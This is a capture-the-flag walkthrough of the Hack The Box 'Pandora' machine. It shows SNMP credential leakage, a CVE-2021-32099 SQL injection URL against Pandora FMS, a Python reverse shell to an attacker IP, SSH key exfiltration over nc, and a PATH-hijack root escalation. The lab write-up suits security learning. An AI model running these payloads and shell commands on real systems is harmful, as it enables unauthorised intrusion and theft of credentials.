Machine Info
- OS: Linux
- Difficulty: Easy
- Points: 20
- Release: 08 Jan 2022
- IP: 10.10.11.136
Network Scanning
We start with using nmap for scanning and the tcp scan gives us two open ports ssh:22 and http:80. We check the website that is running on port 80 and after awhile of checking it, we find nothing interesting to us.
1
nmap -p- -A -T4 10.10.11.136
After thinking for awhile, why we don’t give try to udp scan. Therefore, we use nmap for udp scan and it gives us bunch of filtered/open ports but the one that seems interesting to us is snmp:161 and its version is SNMNPv1 which has no security feature.
1
nmap -sU -A -T4 10.10.11.136
Enumeration
Looking at snmp-processes, we find that there is a credential used before “daniel:HotelBabylon23”. Also, we can find that credential by using snmpwalk.
Exploitation
We try to use that credential to login to ssh and it works.
1
ssh daniel@panda.htb
We check for any other system users and we found “matt” user. We need to escalate our privileges to that user to get user flag.
Privilege Escalation
User Matt
We run linpeas and we find another website that is running locally on port 80.
Therefore, we need to conduct ssh local port forwarding to access that internal service.
1
ssh -L 80:127.0.0.1:80 daniel@panda.htb
Checking the website, it uses Pandora FMS v7.0NG.742. We try to use “daniel:HotelBabylon23” to login but it didn’t work. We found that blog CVE-2021-32099 explains how to gain access as admin through unauthenticated SQL injection and here CVE-2021-32099_Payload is the payload used to gain access.
1
http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=%27%20union%20SELECT%201,2,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20--%20SgGO
Then, we tried to figure out how to upload a shell or backdoor but we couldn’t. So, we google it and we found that script CVE-2021-32099 Pandora_v7.0NG.742 helps us to take an interactive shell.Then, We establish a fully interactive shell and got the user flag.
1
2
3
./sqlpwn.py -t 127.0.0.1
nc -nlvp 4444
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.13",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Root
Again we use linpeas and we found SUID binary called “pandora_backup”. We download it to our local machine to ivestigate it and while using strings we found that it uses tar binary with a relative path. So, We can create our malicious tar binary and prepend its path to $PATH environment variable.
1
strings pandora_backup
We tried to apply the above mentioned approach to escalate our privileges to root without login through ssh as matt and it didn’t work. Therefore, we create a ssh key and then login to ssh as matt.
1
2
3
4
5
6
7
8
9
10
11
#On victim machine
ssh-keygen
cd /home/matt/.ssh
cat id_rsa.pub > authorized_keys
chmod 600 authorized_keys
nc 10.10.16.13 9999 < id_rsa
#On local machine
nc -nlvp 9999 > id_rsa
chmod 600 id_rsa
ssh matt@panda.htb -i id_rsa
Then, we creat our malicious tar binary that executes bash session as root and prepend its path to $PATH environment variable. Now, we run pandora_backup and we got root access.
1
2
3
4
5
6
7
8
cd /tmp
echo '/bin/bash' > tar
chmod +x tar
export PATH=/tmp:$PATH
./pandora_backup
id
cd /root
cat root.txt